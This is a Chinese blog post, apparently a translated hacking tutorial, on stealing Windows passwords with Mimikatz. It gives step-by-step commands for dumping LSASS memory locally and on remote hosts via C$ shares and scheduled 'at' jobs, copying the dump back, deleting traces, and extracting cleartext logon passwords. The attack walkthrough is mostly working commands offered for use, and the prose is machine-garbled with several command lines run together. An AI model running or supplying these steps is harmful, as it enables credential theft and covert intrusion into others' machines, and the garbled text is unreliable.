Mimikatz此刻曾经内置在Metasploit’s meterpreter皮相,咱们可以通过meterpreter下载。但是你假如慨叹还要思索杀毒软件,绑定payload之类的器材偏激冗杂,咱们可以有更好的口头,只需要在人人的电脑上运行Mimikatz alpha(地址)版本,然后措置dump的LSASS进程内存文件就行!
那么如何dump LSASS进程内存呢。可以通过如下举措:
1.对于NT6可以操作windows自带的功用进行dump:
使命计划器—进程—浮现部分用户进程—找到lsass—右键“创立转储文件”
2.对于NT5可以操作微软的Procdump工具(这当然不会惹起杀软报毒)
Procdump:?http://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
号令下列:
Default1 | Procdump.exe -accepteula -ma lsass.exe lsass.dmp |
咱们运行mimikatz的平台(platform)要与进行dump的琐细(source dump)兼容,兼容性下列:
得到dump后的文件咱们就能操作mimikatz获得暗码了。咱们dump人人的电脑当然没什么意思,下面介绍怎么dump外人的电脑。
首先咱们需要可以拜访外人的C$(通常只有计划员可以)
Default12 | net use \\TARGETBOX\C$ /user:DOMAIN\Username passworddir \\TARGETBOX\C$ |
假如上述号令好使的话,咱们接下来操作AT号令。
Default1 | at \\TARGETBOX |
接下来咱们可以在目标主机上开展使命了。
Default1234 | mkdir \\TARGETBOX\C$\Tempdir \\TARGETBOX\C$\Tempcopy c:\temp\procdump.exe \\TARGETBOX\C$\Tempcopy c:\temp\procdump.bat \\TARGETBOX\C$\Temp |
procdump.bat中的模式下列
Default12 | @echo offC:\temp\procdump.exe -accepteula -ma lsass.exe %COMPUTERNAME%_lsass.dmp |
这里一个技艺格式等于dump得到的文件名中有“计较机名”,多么可以让咱们鉴识是来dump的文件自哪台电脑。
咱们持续。 操作?net time?来获知短途主机上的功夫。
Default12 | net time \\TARGETBOXat \\TARGETBOX 13:52 C:\Temp\procdump.bat |
复制dump的文件,然后清理遗迹
Default123 | dir \\TARGETBOX\C$\Tempcopy \\TARGETBOX\C$\Temp\*lsass.dmp C:\temp\output\rmdir /s \\TARGETBOX\C$\Temp |
当前咱们就能运行咱们电脑上的Mimikatz,对得到的.dmp文件进行阐发了(把稳上文提到的兼容性)。号令下列:
Default1234 | mimikatz # sekurlsa::minidump SUPERCOMPUTER_lsass.dmpSwitch to MINIDUMP mimikatz # sekurlsa::logonPasswords full |
到此完毕!咱们得到了短途主机上的暗码。
参考链接:http://www.room362.com/blog/2013/6/7/using-mimikatz-alpha-or-getting-clear-text-passwords-with-a.html
http://blog.gentilkiwi.com/securite/mimikatz/minidump
关系文章推荐《Win2012 Server抓HASH(外地+域)》《通杀WIN办事器得明文暗码神器》
日币处罚:
本文为译文且为原创、首发,作者有人人的现实,文章模式对浸透较没救援,依照本站积分规则给予日币处罚共6枚。
AD:本站凋零投稿及积分(日币),日币可兑换实物处罚,每个月top3可获得礼品一份。
外观请看:积分规则 及 日币超市